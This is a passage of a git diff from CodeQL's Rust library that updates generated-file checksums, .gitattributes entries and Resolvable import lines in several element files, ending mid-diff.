91bea4a1d5ef0779d575567253cd007157d3982524e63a7c49c5cae85cb42e5f lib/codeql/rust/elements/internal/generated/Rename.qll d23f999dab4863f9412e142756f956d79867a3579bd077c56993bdde0a5ac2f1 9256c487d3614bf3d22faa294314f490cf312ab526b8de0882e3a4a371434931 -lib/codeql/rust/elements/internal/generated/Resolvable.qll c038fa24b121ee3e7f6060bce639e7483ea1a14bb552e459b6c67663732dfd6c 4025f2ef318793913e6cfc5d8984e538f402bc062865dcb5496563bec64a2ea9 +lib/codeql/rust/elements/internal/generated/Resolvable.qll 5579fbd90b106c36828b713b6344c5547d3e449078702efa43b21400f69a1aa8 6ad7f9a0285eb4c69c62de7f23ac1da517f3d468407547685d6607d90fd30641 lib/codeql/rust/elements/internal/generated/RestPat.qll b3a4206e68cf67a0310a466721e7c4b3ab855e65490d589d3d856ad333b3d5e8 30b471bec377784f61d73ef93e74fc0dcec7f512ac4b8791d1ca65f2bcea14b8 lib/codeql/rust/elements/internal/generated/RetType.qll a26860cd526b339b9527c089d126c5486e678dd080e88c60ea2fe641e7d661fd a83c1ce32fd043945ad455b892a60c2a9b6a62d7a5aadf121c4b4056d1dfb094 lib/codeql/rust/elements/internal/generated/ReturnExpr.qll c9c05400d326cd8e0da11c3bfa524daa08b2579ecaee80e468076e5dd7911d56 e7694926727220f46a7617b6ca336767450e359c6fa3782e82b1e21d85d37268 @@ -551,7 +550,7 @@ lib/codeql/rust/elements/internal/generated/Static.qll 5fbd6879858cf356d4bdaa6da lib/codeql/rust/elements/internal/generated/Stmt.qll 8473ff532dd5cc9d7decaddcd174b94d610f6ca0aec8e473cc051dad9f3db917 6ef7d2b5237c2dbdcacbf7d8b39109d4dc100229f2b28b5c9e3e4fbf673ba72b lib/codeql/rust/elements/internal/generated/StmtList.qll a667193e32341e17400867c6e359878c4e645ef9f5f4d97676afc0283a33a026 a320ed678ee359302e2fc1b70a9476705cd616fcfa44a499d32f0c7715627f73 lib/codeql/rust/elements/internal/generated/Struct.qll 4d57f0db12dc7ad3e31e750a24172ef1505406b4dab16386af0674bd18bf8f4b 1a73c83df926b996f629316f74c61ea775be04532ab61b56af904223354f033e -lib/codeql/rust/elements/internal/generated/Synth.qll 65873a7fa44e223edc5e76cc768591a036eb2550960a6b6882476f43a01aefba 3e08e2bdfba53ae26d8f48f2d240b92b44c603f03105518c37a963e0cbe63e3f +lib/codeql/rust/elements/internal/generated/Synth.qll 1aeee823f44fe6ee94ca8dcace6b6cae952be9fe3f50b4c500a392d01139f322 2cdd764b8c508e8a8288368fc8ac729c4469f08304711960de6ef9ec72434942 lib/codeql/rust/elements/internal/generated/SynthConstructors.qll e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f lib/codeql/rust/elements/internal/generated/Token.qll 77a91a25ca5669703cf3a4353b591cef4d72caa6b0b9db07bb9e005d69c848d1 2fdffc4882ed3a6ca9ac6d1fb5f1ac5a471ca703e2ffdc642885fa558d6e373b lib/codeql/rust/elements/internal/generated/TokenTree.qll 8577c2b097c1be2f0f7daa5acfcf146f78674a424d99563e08a84dd3e6d91b46 d2f30764e84dbfc0a6a5d3d8a5f935cd432413688cb32da9c94e420fbc10665c @@ -562,7 +561,7 @@ lib/codeql/rust/elements/internal/generated/TupleExpr.qll 75186da7c077287b9a86fc lib/codeql/rust/elements/internal/generated/TupleField.qll d2580e046a576a1a7669463956c929912e383de304854a86eea5e45807a0a882 b41cbc48fcbb56543705e6bf708b72156307c71735d2ed42b97d8bf3c1099dd1 lib/codeql/rust/elements/internal/generated/TupleFieldList.qll 9d4981d04c2ee005e41035b9699f03bff270c4e0515af5482d02e614a0b1a875 4e60b857fbcb668fa1a001e0eff03f1aa3a7465d32ce68e23544b705fa54fc5d lib/codeql/rust/elements/internal/generated/TuplePat.qll d61163a380f3f2c1709080e2df69a90764509af060e607e27e832862e4dae18c 108b7db493a21fe1fa0db99fceee952aabb0a128eac41e050877ab9136407403 -lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 87e0acfeb51d48c55648d5af783f5ea006aaeccce990ba26458c6935fbdf7c11 7c761e66ddacb51307e653c6ad45bec3fba8315049fbe6c4503ed19241204d41 +lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 987745c3c58df38a41f14fce1b59ee82859de7706680f23e52010937fc4646ee 91446a75fd63af87566ff347a7c25c3f6c9cbd75c0d72bdc99590a1af27e8ef4 lib/codeql/rust/elements/internal/generated/TupleType.qll 7fae8e881157a24c4ce4f960269ba8010e227a81d3055b571f861f7196f868e2 18085a19a102df8e2cded938b49709225e89f0ce68b4a003310647bb259a6bd3 lib/codeql/rust/elements/internal/generated/TypeAlias.qll af02bb172b6f2d7f5eab8645a5a219eee8a4bbc445838f5739f18ba217c7e608 6d871471d673adae99c8b146f6f7ab204f24d52b5013b4582037a42b279c9f05 lib/codeql/rust/elements/internal/generated/TypeArg.qll fe4441b3faa44e542c43a85353347df23d3f74da0c4b17cb0fdc60f5aca9dee7 1473d044e979e7cb6628525ffd454549cd8a37560488c695f534243946cf83bc @@ -726,7 +725,9 @@ test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getFormat.ql 02d3fa test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getTemplate.ql c912ac37275cbe7b3b29607bed1a3190c80779436422c14a475113e1bfd91a54 ef90f67a9b952a38ce557b1afbf0b5ce8551e83ddfaad8309a0c9523e40b5ea7 test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql 7a7ee3a3322b4af8cb3b525cfed8cc9719d136ea80aa6b3fb30c7e16394dd93f 5aa8a77d7741b02f8ceb9e5991efa4c2c43c6f1624989218990e985108dae535 test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql 7bd4ec3dde2ef0463585794101e6cc426c368b0e4ab95fbb1f24f8f0a76cf471 e7b01e8b21df5b22c51643e2c909c6fc4ca96fda41b3290c907ba228abe8669b -test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql 2793ba1ff52182dab992d82d3767a000928f6b2fbfdb621349cafc183f0d2480 c3777d03214f7feb9020de3ce45af6556129e39e9b30d083de605b70ab9a0a12 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql f1b727be65d0563c8dffab61248a1b9a59b221fdaae28d3a3fbde3fb17592f5b dbf2395213d261bcf01c3258ab51f073e7934d58af5e2044b64292ed8f71f9a4 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql f7288c9be7b31a6c78da9e2f4e774522013c2db8ff457dfb5edced009b65ebdd 58ea795ccf649f733c995c49da4680f68599d58f466cb63415a12f4cc9d0ab11 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql 56a0347a705b5719a97f520b2c0777c97e73bc2d977dc5d00910679950eae5ca 1ef63883dd83a22f56f226348e8fb9bf72817df19ff2708a4559a5f7b8a2855a test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql 26d592398a17795427b5b6b51ff4a013ee15c31443e732a000baca5f2e65acca 7940a864b84b89e84d7fb186599cb8b6bcbead7141c592b8ab0c59fcd380d5fb test/extractor-tests/generated/Function/Function.ql c1c2a9b68c35f839ccd2b5e62e87d1acd94dcc2a3dc4c307c269b84b2a0806e6 1c446f19d2f81dd139aa5a1578d1b165e13bddbaeab8cfee8f0430bced3a99ab test/extractor-tests/generated/Function/Function_getAbi.ql e5c9c97de036ddd51cae5d99d41847c35c6b2eabbbd145f4467cb501edc606d8 0b81511528bd0ef9e63b19edfc3cb638d8af43eb87d018fad69d6ef8f8221454 @@ -895,12 +896,16 @@ test/extractor-tests/generated/ParenPat/ParenPat.ql 565182ccd81a9b420911b488c083 test/extractor-tests/generated/ParenPat/ParenPat_getPat.ql 96f3db0ec4e71fd8706192a16729203448ccc7b0a12ba0abeb0c20757b64fba1 0c66ba801869dc6d48dc0b2bca146757b868e8a88ad9429ba340837750f3a902 test/extractor-tests/generated/ParenType/ParenType.ql 81c8ad667397ce36157941abd9b879e9305a440018853af4528eb737ae4d2935 3ef3b86203b0143be2d7f7f4833f55fd6c226cb9205e3c1940b6c2a1371622f3 test/extractor-tests/generated/ParenType/ParenType_getTy.ql 41dd6605e7b348618156712b559e2f1b6aac02d6c727e8cbf8653530794ec969 30ac6611c730e76cfb75f98efcf817783a50cec0cf3b3197459d7642f74dde85 -test/extractor-tests/generated/Path/Path.ql f17c1c4d23c0d5e9776cee84444f6ee7445de88afbc1f26c34b96e13ab618158 89499cb0f63b3634d6b5e2b8c4a13bd4401ce82e54af0ab46e41a34b0288eeb9 -test/extractor-tests/generated/Path/PathExpr.ql b9696cd7ad9f3874e4bc4b1b9c77f42f06ab6c61b77fb641458da63667087b9b db84a7a8dd05e30ff80733af01f08d43ff031bb4b3e3af06332a73ba7e7bbc43 +test/extractor-tests/generated/Path/Path.ql 2bdcd99b3b5ffc83ac47d8cc27a4561d616bcf06844f0c452c699cd10ee640ca 5a7d7ffb8b0c04d6a8cbb2a953761df8561b796c4372bef1bd55c359b2f19911 +test/extractor-tests/generated/Path/PathExpr.ql 7716664d4f2254456df9d0f44836e761df60c96133d484cbda39e6cbb3152610 4ee3dd2b9fb1f223de0151db71cb623e93dea9afec125222f91e2bc02173173d test/extractor-tests/generated/Path/PathExpr_getAttr.ql 2ccac48cd91d86670c1d2742de20344135d424e6f0e3dafcc059555046f92d92 9b7b5f5f9e3674fad9b3a5bcd3cabc0dff32a95640da0fce6f4d0eb931f1757d test/extractor-tests/generated/Path/PathExpr_getPath.ql e7894071313a74166bdd31d7cd974037fcd5a7f0e92d5eec42833266196eb858 46a06e8a1207e7a0fa175cd4b61068e5fd6c43b5575b88986409f0ac2be64c51 -test/extractor-tests/generated/Path/PathPat.ql 823732954a5882e33a37bd0bf0cafb2cec51659a5203a4831eec2516da0e49fa 54001149718a9ca15d8c0d4be63f3fe00a9f0d44fa1309e2f605d7932355ea5d +test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql a68a1f0d865d10c955f7ab1fd7614b517e660553b65fabb9daa8f302adbc2602 c47480d6440ae63be27d8158a35536a8d9051817dec1521cdcab297ddb52e1ae +test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql dfa55fe480da0df37670660fc1c54b6c38d47365353bc9d4f662183b33d4e80f 1b18329a7b60805fc073df3149c48f39aa66924d7eefedecbca36a2b170a7fbe +test/extractor-tests/generated/Path/PathPat.ql 6b9d973009f1b4963c7c83b0f5051eda7a76c8fb4a789217b4a25cbab0cdb274 57f0621dd3657b6f4630d5406816effcc6bc1b03361aa12e118e807e28e9e71b test/extractor-tests/generated/Path/PathPat_getPath.ql 6c0c71c80a6e631ea7775ec8660b470ff6b264bab14a399606cf113b1fb190fc 8e34cbb4d064db929e94652e1901ec4f26affa71e30e556b7acdff71dd622cbb +test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql f690fd9a8773e7c73b70f2d64ee919fef8eee243c5a315c4a6d2713d43ea0e43 f37817427c36cec14a2e07f99d3a32f37f3f27a8eafdf170749ec2780054729b +test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql 55df4541a7b0e82198acfcedd7dc99eb564908270e4fb2b032bf05e40fba6fef a5932d884903da901263f88644c8585a45045190d7204f630506c5aece798288 test/extractor-tests/generated/Path/PathSegment.ql efc39cea1b4c0b2b0da6434136334430d074699f84124d6bcf94c24aa854dc64 c0a4bd60c67665c058ca22a59e535e925fdb00dec95ffc5c71697fb0ed78a329 test/extractor-tests/generated/Path/PathSegment_getGenericArgList.ql 8f6e67b3e316309f20e21d7e7944accf66b0256b76fa50ee9a714044c6ec8cea 15f10a701fc4d3f9fd6734da90790cdbc8a1ddd57bf52695740acedcb2e6e485 test/extractor-tests/generated/Path/PathSegment_getNameRef.ql 799d284e2f9267d6bbe67aa7035e525ef347dc74cb3e2180e7b2171b5cb49674 592130bc2358989536abf62e8a261272c851483ede4f19783f7d61ffc1803e4b @@ -913,8 +918,6 @@ test/extractor-tests/generated/Path/PathType.ql cb67b05cf7e4f32cbd46ac89a15f6eaf test/extractor-tests/generated/Path/PathType_getPath.ql 7043c7939e4f835e4b2c7e3e207637c362d7a9dbdba0151b38c873fdaf43e7a5 ee2aad1b4fb2b00e1a5d39387848aa164a39e3cd49141f07c175b205c8451bb1 test/extractor-tests/generated/Path/Path_getPart.ql 8aa45a0b58203ef1177166efbe1c2851faf4b4c9a453c83137f0c9298badcdbf b82d490d9b3a8237487cd5da8b3b6fc4aa477977b332a5c6539b3cd4e6d5b45b test/extractor-tests/generated/Path/Path_getQualifier.ql 9af95e22cdf3a65da6a41d93136aef4523db5ce81d38f6ed4bc613f1c68784d0 3102d9241a417a92c97a53ac56a7a8683463f1adc7a593cda1382c0d25b3f261 -test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql 7c0ff524595514630de4178028260d4832bfc4f57bfddec9f8e72a6c6dbf241c 55e617380476c183ef9259199d2cfd551b07466e94bc452c4723754d0c82691b -test/extractor-tests/generated/Path/Path_getResolvedPath.ql 20c8977781dfe687d5db03290612179cf1360eb47b86ea62d25d1eef62a681e7 c35b76e7d63c05dc80867285bb913042cbe90b45d4d4306df9eac2cba5e8db70 test/extractor-tests/generated/PrefixExpr/PrefixExpr.ql 44fb7174365c6deecdc22c720d84617c6e060c05d49c41c90433451588f8aa6f 871fab471c82fede3c36edc003f9decee5bb7844c016951d28be78d0c91487e5 test/extractor-tests/generated/PrefixExpr/PrefixExpr_getAttr.ql fdad6ad5199435ded1e4a9ea6b246e76b904cd73a36aaa4780e84eef91741c5b 75d63940046e62c1efa1151b0cac45b5ec0bab5e39aec2e11d43f6c385e37984 test/extractor-tests/generated/PrefixExpr/PrefixExpr_getExpr.ql 2d1d97f6277794871fbb032ea87ac30b1aa902a74cd874720156162057ea202e b1b9880fce07d66df7ec87f12189c37adf9f233a1d0b38a1b09808d052a95642 @@ -930,9 +933,11 @@ test/extractor-tests/generated/RangePat/RangePat.ql 97314b9a5543a7471d722ae188a6 test/extractor-tests/generated/RangePat/RangePat_getEnd.ql 723eb5030ec52d3aa3650a3e2de6cc0195a0030630239b972235963320e0d808 2df3b1a6197c3abd43dc743fd09cbf55165e3191f2b49336777594541e5da96a test/extractor-tests/generated/RangePat/RangePat_getOperatorName.ql 564216b2342f56dc8c1aed6306f57b6dafb33de9e3ba337a840a8c077ce95933 2a76ec7a59bada29733a1515bc1ea8bedd37429d1694ca63c7a8fbf94098a4c7 test/extractor-tests/generated/RangePat/RangePat_getStart.ql ad2066efa32fced2dd107031f2a9b9635c3c892e874870a4320522bae9309aa4 b4a8c57a838074e186b823938d1a9372153c193da6c839b5f242ca25c679e83f -test/extractor-tests/generated/RecordExpr/RecordExpr.ql 1b8f5c315f8038e531bd92c5402acdafdbc9468e2f4474cbeffddca37cc87fb6 9458b2815fd13848659bdc2ce1e9566fccdb0b2c9f018c79885ba7608df07a5a +test/extractor-tests/generated/RecordExpr/RecordExpr.ql 220f7f766587dc9df1c6f81a1cda3d19d7d5e92a31c63752061297e1adf96bf0 792bbe4503adcb63f7ac0f11259bb60a8ce05538ba1676f141989a73ff4eb5c0 test/extractor-tests/generated/RecordExpr/RecordExpr_getPath.ql 2eb8f7591f08199d124732d7f2d7dd3e81792a52f8e6c90003aa0609923f8cb0 27e245224d6c9aa20023b418ce8dffff1293b50a0e10938932631fca7c559e78 test/extractor-tests/generated/RecordExpr/RecordExpr_getRecordExprFieldList.ql 6d3d872eb64ff8cd7317190f9b2627d3fa6a74976e362cfb49e21c6623d63f82 d98b07f932ecb25a427e655017de47f951d3eabc4eedbc6f873571ce8921e9ff +test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql 87d463c7950407c86783b9ccbcf6daa4f62f5fcb75bc20f1879bde9240281d4d 5659b4fb8b25cd998211aa3edb11188b3c487cabaf7a09989ce6fe0e4f67ba25 +test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql 0de885c7efdd257ee44d2c8a2ad91e419d604517471966059ddae321e80597b6 7977fb7a8c954733dbb5cf8378d6103688d16bc4c9b891c68098d0ec224429b4 test/extractor-tests/generated/RecordExprField/RecordExprField.ql 62ee00e478fcf07421b5989943a487ecc0c99cf50ec87f05aabe89dfb03f2a32 ad7c6ce362032e18fc9950b885c4b7b5c907e6abd2af2d13ecef84eb980027fb test/extractor-tests/generated/RecordExprField/RecordExprField_getAttr.ql 789d20f8c0bb0e9567d3d9a0c0266a04841cda0dbdbe10af8c450d5a82bb289e 9036f5b0e7ddf301012f52f3919804382421061366d2a4f3a016e9783befec6d test/extractor-tests/generated/RecordExprField/RecordExprField_getExpr.ql 7dcb5cf0d04bcd62b655fa0626535526cdaa0f891845f4b22cb50fcf1ae3e511 a177db76e4e9583438fad9bfb1300fed9e812c1046c44dccd307bf3a46603a69 @@ -948,9 +953,11 @@ test/extractor-tests/generated/RecordField/RecordField_getTy.ql 601fbb244267f366 test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql cc45e9bb9418d15cef07a1827358c3f18a8737324c8e6852591a2da70df89360 45557497fc165a212fffda71dedabc8159a4f72323430df732698a18922b366c test/extractor-tests/generated/RecordFieldList/RecordFieldList.ql 586bccfa550243177d9fdfd6900a473f51a76ed360b537f19cb300330d5dad5b a063373dfdbf06b68c69694ea4ae72a26b906c910f9095894c09e72f8fb52819 test/extractor-tests/generated/RecordFieldList/RecordFieldList_getField.ql 2eb92ef8528204f3f105c19a36cdc06b3b6d20242463ff2ed1fb81c544812a71 d69091899e7157099f117e14fe60cd3705cfda45f28f6a6a2b7234a4a9c1e664 -test/extractor-tests/generated/RecordPat/RecordPat.ql 01510828e1facc6551e06241e41636259883a546ad43b08499468c14d6052768 fcf3873fe1cd1ebe4910150763aa350f882ca8e84603f35520bb0beeea2c21af +test/extractor-tests/generated/RecordPat/RecordPat.ql 24469c2a0902196d49249a37a0b56bf9fe62d1e7af3150813200b25ccb46dfaa 479e58d4fe6db7048e0649fd5a9c1b8ca1ceb8aa52a80dd07a999a07e32b0a3f test/extractor-tests/generated/RecordPat/RecordPat_getPath.ql 187b8d44de158fc809257e28b2e8fdd246c8eb3c60115d54cd53396a320e372d 74813fd13c6f34927420ed44620743f7c80c537984e0db72c1c5f4b754b40b83 test/extractor-tests/generated/RecordPat/RecordPat_getRecordPatFieldList.ql 32e45a6f59cdb8edbf7f9326164e225a7f545fabd2dd168b660699954a999fdf 325c9121dc130459426b473691876a0698b51d5cdf4530698a398510ce8e3051 +test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql 61a47db765e0c45797d3f92318fb6dbf07dfe1a2e63704294c58d49cb0894676 86a636746458053278a8ba0be062a9b1cfcad4866e065a8317fa8f033518ecae +test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql 0221208e93c4a26e555dd848238b4f5bcabf2ccf3fc38ceb2eef45c39d67b21a 37d80014a21a19e9132ad645a17234e33bb20f2352b450277b8fa919a54b95e9 test/extractor-tests/generated/RecordPatField/RecordPatField.ql 6c51343258e56673d21b7ae73e7de011319ffa2eb65390e697f875bb428d25d1 82c3232db0cb353140618749b1cba5549b0ff43cbbaafb203077e18dbedb2c10 test/extractor-tests/generated/RecordPatField/RecordPatField_getAttr.ql fb0592f7a1be4fd9c6f36c79dee5a0f6711b0a7820b079f8e95413722ae1aeb7 9dfb0de00ec9c4a23efd38515c63a3567204f2a3ac2634858296f58aa564d170 test/extractor-tests/generated/RecordPatField/RecordPatField_getNameRef.ql 3380a41d6cecd80681fc955719fa11377c32a5e0be276871f2d0d75ae62d8f0a 44efe89657d3a59fb94962d0fbf52d06571e203863a3d9e9dd47a5135a8ba4d9 @@ -1046,9 +1053,11 @@ test/extractor-tests/generated/TupleFieldList/TupleFieldList.ql 7dc88440222ff036 test/extractor-tests/generated/TupleFieldList/TupleFieldList_getField.ql ad552a9c0b9964d1770f14cabbb436db60ebedc3c569006542a8eae9ddb30f6d 3a8c49d629376a9b8326138836b05ee2366b1021ffd19f5be74ab023e70aa50d test/extractor-tests/generated/TuplePat/TuplePat.ql 24ee56bc848537da65eb8ecef71e84cc351a2aedcc31d6fb53a5b7865f15f7c2 81db1076e2e4921ceb50933b96cd7b574caab1818de257c1e9038f3f97447d59 test/extractor-tests/generated/TuplePat/TuplePat_getField.ql f000bed41af031bc56d0705ce312abe7ab3dc6745b2936798c9938781e51475e f464a84dbc36aa371d60d6db68d6251f6b275dc4ecebdc56f195637be390b067 -test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 6e6cfba0d2565782088af55ca977ada3d8093200aa180a49a67c9a176c52c254 c10c93823a9d814d694ca88fdf65a9bf8c1bb178e50c08982a97aa8d445284b3 +test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 194b2fbfc83a84caf76032f3c63a1f7e618f71e5ea5be449e9d2691b0fce9829 0ff24488ba5729591ce86a702fdfb6f4e0498f96d89bf5c4bd05bd90523f9435 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql f3f2e23cc2a32aa5abc1e0fda1300dab1693230632b9eaa75bb3b1e82ee9ea1a 24b87a39ec639a26ff8c1d04dc3429b72266b2a3b1650a06a7cd4387b6f0e615 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql 13a06696bbf1fa8d5b73107e28cdba40e93da04b27f9c54381b78a52368d2ad1 5558c35ea9bb371ad90a5b374d7530dd1936f83e6ba656ebfbfd5bd63598e088 +test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql e409667233331a038e482de4b2669d9fac9d7eb0e3bd5580ea19828f0c4ed7ad 588e4628471f1004575900d7365490efcf9168b555ff26becfc3f27b9e657de3 +test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql 150898b6e55cc74b9ddb947f136b5a7f538ee5598928c5724d80e3ddf93ae499 66e0bd7b32df8f5bbe229cc02be6a07cb9ec0fe8b444dad3f5b32282a90551ee test/extractor-tests/generated/TupleType/TupleType.ql e5951a30817b8c51fe9cb9435f75bfdca2a1277b2094267d3205e33ef1ee9a9c 9a4d57322ed2cff57057654272981b056f833136f983141b033afaf64e19c117 test/extractor-tests/generated/TupleType/TupleType_getField.ql b73a8cdaf6ba46cf9b63d8819239d2d2c06b3496ed4768e8a387a7558178fbd8 6efbcf13c25d0ff3ed0c6d194ba44d2abfa620406badef8184953395fab92bb4 test/extractor-tests/generated/TypeAlias/TypeAlias.ql 87645d4aa0e2c789dfd7111c6150e72c65b2e108b371bb5fc247aa8d34a25893 6335b4e56d998eed57d8f026d2d1dbfc018754e87c755e1194a2ef9f7a468233 diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index c75ea349c0d..973f32e7d9b 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -372,7 +372,6 @@ /lib/codeql/rust/elements/internal/TuplePatConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TuplePatImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TupleStructPatConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TupleTypeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TupleTypeImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TypeAliasConstructor.qll linguist-generated @@ -729,6 +728,8 @@ /test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql linguist-generated +/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql linguist-generated /test/extractor-tests/generated/Function/Function.ql linguist-generated /test/extractor-tests/generated/Function/Function_getAbi.ql linguist-generated @@ -901,8 +902,12 @@ /test/extractor-tests/generated/Path/PathExpr.ql linguist-generated /test/extractor-tests/generated/Path/PathExpr_getAttr.ql linguist-generated /test/extractor-tests/generated/Path/PathExpr_getPath.ql linguist-generated +/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/Path/PathPat.ql linguist-generated /test/extractor-tests/generated/Path/PathPat_getPath.ql linguist-generated +/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment_getGenericArgList.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment_getNameRef.ql linguist-generated @@ -915,8 +920,6 @@ /test/extractor-tests/generated/Path/PathType_getPath.ql linguist-generated /test/extractor-tests/generated/Path/Path_getPart.ql linguist-generated /test/extractor-tests/generated/Path/Path_getQualifier.ql linguist-generated -/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql linguist-generated -/test/extractor-tests/generated/Path/Path_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr_getAttr.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr_getExpr.ql linguist-generated @@ -935,6 +938,8 @@ /test/extractor-tests/generated/RecordExpr/RecordExpr.ql linguist-generated /test/extractor-tests/generated/RecordExpr/RecordExpr_getPath.ql linguist-generated /test/extractor-tests/generated/RecordExpr/RecordExpr_getRecordExprFieldList.ql linguist-generated +/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField_getAttr.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField_getExpr.ql linguist-generated @@ -953,6 +958,8 @@ /test/extractor-tests/generated/RecordPat/RecordPat.ql linguist-generated /test/extractor-tests/generated/RecordPat/RecordPat_getPath.ql linguist-generated /test/extractor-tests/generated/RecordPat/RecordPat_getRecordPatFieldList.ql linguist-generated +/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField_getAttr.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField_getNameRef.ql linguist-generated @@ -1051,6 +1058,8 @@ /test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql linguist-generated /test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql linguist-generated /test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql linguist-generated +/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/TupleType/TupleType.ql linguist-generated /test/extractor-tests/generated/TupleType/TupleType_getField.ql linguist-generated /test/extractor-tests/generated/TypeAlias/TypeAlias.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/Path.qll b/rust/ql/lib/codeql/rust/elements/Path.qll index cb228373cf5..a3549e66a85 100644 --- a/rust/ql/lib/codeql/rust/elements/Path.qll +++ b/rust/ql/lib/codeql/rust/elements/Path.qll @@ -4,8 +4,8 @@ */ private import internal.PathImpl +import codeql.rust.elements.AstNode import codeql.rust.elements.PathSegment -import codeql.rust.elements.Resolvable /** * A path. For example: diff --git a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll index e2e45e718f0..95fd48d6386 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll @@ -5,6 +5,7 @@ private import internal.PathExprBaseImpl import codeql.rust.elements.Expr +import codeql.rust.elements.Resolvable /** * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. diff --git a/rust/ql/lib/codeql/rust/elements/PathPat.qll b/rust/ql/lib/codeql/rust/elements/PathPat.qll index 17dc5f71381..2c360a2b858 100644 --- a/rust/ql/lib/codeql/rust/elements/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/PathPat.qll @@ -6,6 +6,7 @@ private import internal.PathPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable /** * A path pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll index 90edf3d0c03..c993059e977 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll @@ -7,6 +7,7 @@ private import internal.RecordExprImpl import codeql.rust.elements.Expr import codeql.rust.elements.Path import codeql.rust.elements.RecordExprFieldList +import codeql.rust.elements.Resolvable /** * A record expression. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/RecordPat.qll index 671bafda1c3..fb37a42659b 